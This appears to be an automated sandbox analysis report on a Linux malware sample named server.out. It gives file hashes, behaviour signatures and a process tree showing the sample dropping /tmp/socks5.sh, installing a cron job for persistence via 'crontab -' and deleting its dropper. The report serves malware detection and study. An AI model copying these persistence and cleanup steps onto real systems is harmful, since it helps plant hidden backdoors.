Analysis

  • max time kernel
    154s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09-05-2023 04:53

General

  • Target

    server.out

  • Size

    15KB

  • MD5

    4e0a5548d669fb559fc9557c29d1300d

  • SHA1

    20c475d06b77ea4078db08814acebc6c9d8a47ca

  • SHA256

    b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4

  • SHA512

    7f128a3110bea36b22a3f784b991f0a4b44f2c01a5df837ac0badb3742f8da742f0bd971fa492829db413c9f69b6dd8c64ec6934b33da4ef11d0025522878dbb

  • SSDEEP

    192:GflaEbxJEYalA9qF9Aig5B7PNTa8EBiB6hygBCyftVm5cmF4tGEApxn:3UClA9kxg/FTyUM4gBCyftV2342px

Score
7/10

Malware Config

Signatures

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/server.out
    /tmp/server.out
    1⤵
    • Writes file to tmp directory
    PID:575
    • /tmp/socks5.sh
      /tmp/socks5.sh
      2⤵
      • Executes dropped EXE
      PID:576
      • crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:578
      • rm
        rm -rf /tmp/socks5.sh
        3⤵
          PID:580
        • cat
          cat /dev/fd/63 /dev/fd/62
          3⤵
            PID:577
      • sed
        sed /socks5_backconnect777/d /dev/fd/62
        1⤵
        • Reads runtime system information
        PID:583
      • crontab
        crontab -l
        1⤵
          PID:584

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/socks5.sh

          Filesize

          200B

          MD5

          c7633fc3d5c9fd11a808d417f3c20fe9

          SHA1

          a3fca1a5cd8619e1eecc532b42dd5ec3a68ae2f7

          SHA256

          6c4668b770274cf679f6a8781c11d9df3b766325ee19b03ba780192e3a313493

          SHA512

          369c7be63ac24f3a94516671f1d8d4e61b1f2df4af59eee0c034d069c787d41c7e60321be0f31226a4fc047f606fcf22ce3ae8566b5918d75da36c7e1e1382c7

        • /var/spool/cron/crontabs/tmp.rPSzjx

          Filesize

          253B

          MD5

          2ccb7c92315681d496385384c7f998c4

          SHA1

          5b2baff7c4a9fd8e7ee3857932ded50060e997e3

          SHA256

          d36ef9d046aa46e8966784b7cb4ee7cf00778215de50a9830cca8c9375449912

          SHA512

          27366cb20280d394a3837bfc54fd2c41f20883cdbb9080599b57283e4efe2210c61116440ff0b9a217adcf8ce8298dd1f47347449c826a8f2dbc483952a400cd